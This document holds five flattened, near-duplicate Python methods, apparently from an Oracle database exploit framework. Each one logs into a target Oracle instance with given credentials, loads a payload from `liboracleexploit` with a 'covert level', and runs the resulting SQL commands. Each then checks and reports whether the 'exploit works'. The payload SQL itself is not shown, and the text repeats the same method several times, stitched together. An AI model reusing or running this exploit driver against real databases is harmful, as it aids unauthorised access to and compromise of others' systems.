def run(self): self.readConfig() # Try connecting to the instance self.gom.echo( "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid)) self.connect() self.gom.echo("[+] Selecting payload ... ") payload = liboracleexploit.getPayload(self.dict, self.payload) payload.user = self.user payload.function = self.function payload.connection = self.connection if self.command: payload.command = "" self.gom.echo("[+] Covert level is %s" % str(self.covert)) payload.covert = self.covert payload.run() theCommand = () theCommand += (data.replace("%FUNCTION%", payload.function), ) cursor = self.connection.cursor() for command in theCommand: self.gom.echo("[+] Running command ... ") self.gom.echo(command) try: cursor.execute(command) for x in cursor.fetchall(): pass except: self.gom.echo("[!] Exception:") self.gom.echo(sys.exc_info()[1]) if payload.verify(self.connection): self.gom.echo("[+] Exploit works with selected payload.") return True else: self.gom.echo("[!] Exploit doesn't work with selected payload :(") return False
def run(self): self.readConfig() # Try connecting to the instance print "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid) self.connect() print "[+] Selecting payload ... " payload = liboracleexploit.getPayload(self.dict, self.payload) payload.user = self.user payload.function = self.function payload.connection = self.connection if self.command: payload.command = "" print "[+] Covert level is %s" % str(self.covert) payload.covert = self.covert payload.run() theCommand = () theCommand += (data.replace("%FUNCTION%", payload.function), ) cursor = self.connection.cursor() for command in theCommand: print "[+] Running command ... " print command try: cursor.execute(command) for x in cursor.fetchall(): pass except: print "[!] Exception:" print sys.exc_info()[1] if payload.verify(self.connection): print "[+] Exploit works with selected payload." return True else: print "[!] Exploit doesn't work with selected payload :(" return False
def run(self): self.readConfig() # Try connecting to the instance print "[+] Connecting to the instance %s/%s@%s:%s/%s" % ( self.user, self.password, self.target, str(self.port), self.sid) self.connect() print "[+] Selecting payload ... " payload = liboracleexploit.getPayload(self.dict, self.payload) payload.user = self.user payload.function = self.function payload.connection = self.connection if self.command: payload.command = "" print "[+] Covert level is %s" % str(self.covert) payload.covert = self.covert payload.run() theCommand = () theCommand += (data.replace("%FUNCTION%", payload.function), ) cursor = self.connection.cursor() for command in theCommand: print "[+] Running command ... " print command try: cursor.execute(command) except: print "[!] Exception:" print sys.exc_info()[1] if payload.verify(self.connection): del payload print "[+] Exploit works with selected payload." return True else: del payload return False
def run(self): self.readConfig() # Try connecting to the instance self.gom.echo( "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid)) self.connect() self.gom.echo("[+] Selecting payload ... ") payload = liboracleexploit.getPayload(self.dict, self.payload) payload.user = self.user payload.function = self.function payload.connection = self.connection payload.method = 0 # We need to create a function becuase there is no sufficient space to insert dbms_sql.execute if self.command: payload.command = "" self.gom.echo("[+] Covert level is %s" % str(self.covert)) payload.covert = self.covert theCommand = () theCommand += (payload.run(), ) theCommand += (data.replace("%FUNCTION%", self.function).replace( "%USER%", self.user), ) cursor = self.connection.cursor() for command in theCommand: self.gom.echo("[+] Running command ... ") self.gom.echo(command) try: cursor.execute(command) except: self.gom.echo("[!] Exception:") self.gom.echo(sys.exc_info()[1]) if payload.verify(self.connection): self.gom.echo("[+] Exploit works with selected payload.") return True return False
def run(self): self.readConfig() # Try connecting to the instance print "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid) self.connect() print "[+] Selecting payload ... " payload = liboracleexploit.getPayload(self.dict, self.payload) payload.user = self.user payload.function = self.function payload.connection = self.connection payload.method = 0 # We need to create a function becuase there is no sufficient space to insert dbms_sql.execute if self.command: payload.command = "" print "[+] Covert level is %s" % str(self.covert) payload.covert = self.covert theCommand = () theCommand += (payload.run(), ) theCommand += (data.replace("%FUNCTION%", self.function).replace("%USER%", self.user), ) cursor = self.connection.cursor() for command in theCommand: print "[+] Running command ... " print command try: cursor.execute(command) except: print "[!] Exception:" print sys.exc_info()[1] if payload.verify(self.connection): print "[+] Exploit works with selected payload." return True return False